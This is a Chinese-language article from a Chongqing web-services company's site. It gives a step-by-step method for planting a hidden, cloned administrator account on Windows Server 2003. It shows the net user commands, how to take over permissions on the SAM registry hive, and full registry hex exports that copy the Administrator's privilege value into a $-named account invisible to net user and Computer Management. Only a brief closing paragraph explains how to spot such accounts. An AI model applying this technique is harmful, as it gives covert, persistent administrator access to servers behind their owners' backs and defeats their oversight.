专业,专注,企业信息化建设-中技互联网
品牌建站 OA系统 重庆seo 全国咨询电话 023-67742189 建站 67742189 维护 67742189

网站超市 商城WEB FLASH站点

首页 >> 网站优化 >> 服务器常识 >> 如何在Win2003服务器添加隐藏用户及如何看穿隐藏用户
如何在Win2003服务器添加隐藏用户及如何看穿隐藏用户
作者:王未 来源:www.zjcoo.net 日期:2013-05-28
文章分享:

   先建立 cnlnfjhh$ 用户

  c:\>net user cnlnfjhh$ wrsky /add

  //后面加$ 是为了使在 控制台下用 net user 看不到.

  然后运行regedt32.exe(注意不是regedit.exe)

  先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 添加自己现在登录的帐户或组,

  把"权限"->"完全控制"->"允许"打上勾,然后确定.

  这样就可以直接读取本地sam的信息

  现在运行regedit.exe

  打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$

  查看默认键值为"0x3f1" 相应导出如下

  HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\cnlnfjhh$ 为cnlnfjhh$.reg

  HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg

  HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键)

  用记事本打开lf4.reg 找到如下的"F"的值,比如这个例子中如下

  "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

  00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\

  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\

  00,00,00,00,00,00,00

  把其复制后,打开3f1.reg,找到"F"的值,将其删除,然后把上面的那段粘贴.

  打开aspnet$.reg,把里面的内容,比如这个例子中如下面这段复制

  [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]

  @=hex(3f1):

  回到3f1.reg 粘贴上面这段到文件最后,最后生成的文件内容如下

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]

  "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\

  00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\

  f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\

  00,00,00,00,00,00,00

  "V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\

  00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\

  14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\

  01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\

  00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\

  00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\

  08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\

  00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\

  00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\

  00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\

  00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\

  00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\

  00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\

  00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\

  00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\

  e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\

  00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\

  00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\

  4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\

  76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\

  ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\

  fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\

  37,f1,02,cf,01,00,01,00,01,00,01,00

  [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]

  @=hex(3f1):

  保存后,将cnlnfjhh$用户删除

  c:\>net user cnlnfjhh$ /delete

  运行regedit.exe 将我们已经修改好的3f1.reg文件导入.

  最后,打开regedt32.exe 找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 删除刚才添加的帐号

  然后 注销当前用户 用 cnlnfjhh/wrsky 登陆 就会是 最高权限了.

  03克隆的方法和 2000的克隆 略有点区别 就是我文章的那前一部分.

  这样就建立了一个在控制台用 net user 和"计算机管理"中都看不到的帐户cnlnfjhh$, 记着第一次就把密码设置好,不要改密码

  -------------------------------------------------------------------------------

  反之。打开[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names

  users下面的项目跟names下面的项目数量不一致时(比names下面的多),肯定有内鬼。看names项目的键值对应users下面的项目名称,对应不上的话就删掉吧。

  看到上面这些字符是不是脑袋都大了?中技也觉得,不过确实是有效的方法,多掌握一些别人没有的知识肯定是对我们建设网站有好处的。

重庆中技互联网信息咨询有限公司 www.zjcoo.net

文章分享: